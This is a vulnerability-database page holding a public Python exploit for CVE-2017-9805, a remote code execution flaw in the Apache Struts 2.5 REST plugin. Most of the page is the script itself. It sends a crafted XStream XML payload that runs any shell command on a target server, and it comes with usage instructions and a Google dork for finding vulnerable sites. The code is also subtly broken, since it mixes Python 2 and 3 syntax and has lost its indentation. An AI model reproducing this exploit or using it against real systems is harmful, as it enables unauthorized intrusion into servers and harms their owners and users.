Lucene search
WarflopPACKETSTORM:144050
HistorySep 07, 2017 - 12:00 a.m.
Apache Struts 2.5.12 XStream Remote Code Execution

2017-09-0700:00:00
Warflop
packetstormsecurity.com
141
0.975 High
EPSS
Percentile
100.0%
JSON
`# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE  
# Google Dork: filetype:action  
# Date: 06/09/2017  
# Exploit Author: Warflop  
# Vendor Homepage: https://struts.apache.org/  
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip  
# Version: Struts 2.5 a Struts 2.5.12  
# Tested on: Struts 2.5.10  
# CVE : 2017-9805  
  
#!/usr/bin/env python3  
# coding=utf-8  
# *****************************************************  
# Struts CVE-2017-9805 Exploit  
# Warflop (http://securityattack.com.br/)  
# Greetz: Pimps & G4mbl3r  
# *****************************************************  
import requests  
import sys  
  
def exploration(command):  
  
exploit = '''  
<map>  
<entry>  
<jdk.nashorn.internal.objects.NativeString>  
<flags>0</flags>  
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">  
<dataHandler>  
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">  
<is class="javax.crypto.CipherInputStream">  
<cipher class="javax.crypto.NullCipher">  
<initialized>false</initialized>  
<opmode>0</opmode>  
<serviceIterator class="javax.imageio.spi.FilterIterator">  
<iter class="javax.imageio.spi.FilterIterator">  
<iter class="java.util.Collections$EmptyIterator"/>  
<next class="java.lang.ProcessBuilder">  
<command>  
<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>  
</command>  
<redirectErrorStream>false</redirectErrorStream>  
</next>  
</iter>  
<filter class="javax.imageio.ImageIO$ContainsFilter">  
<method>  
<class>java.lang.ProcessBuilder</class>  
<name>start</name>  
<parameter-types/>  
</method>  
<name>foo</name>  
</filter>  
<next class="string">foo</next>  
</serviceIterator>  
<lock/>  
</cipher>  
<input class="java.lang.ProcessBuilder$NullInputStream"/>  
<ibuffer/>  
<done>false</done>  
<ostart>0</ostart>  
<ofinish>0</ofinish>  
<closed>false</closed>  
</is>  
<consumed>false</consumed>  
</dataSource>  
<transferFlavors/>  
</dataHandler>  
<dataLen>0</dataLen>  
</value>  
</jdk.nashorn.internal.objects.NativeString>  
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>  
</entry>  
<entry>  
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>  
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>  
</entry>  
</map>  
'''  
  
  
url = sys.argv[1]  
  
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',  
'Content-Type': 'application/xml'}  
  
request = requests.post(url, data=exploit, headers=headers)  
print request.text  
  
if len(sys.argv) < 3:  
print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')  
print ('[*] Warflop - http://securityattack.com.br')  
print ('[*] Greatz: Pimps & G4mbl3r')  
print ('[*] Use: python struts2.py URL COMMAND')  
print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')  
exit(0)  
else:  
exploration(sys.argv[2])  
  
`
0.975 High
EPSS
Percentile
100.0%
JSON
Apache Struts 2.5.12 XStream Remote Code Execution

Related
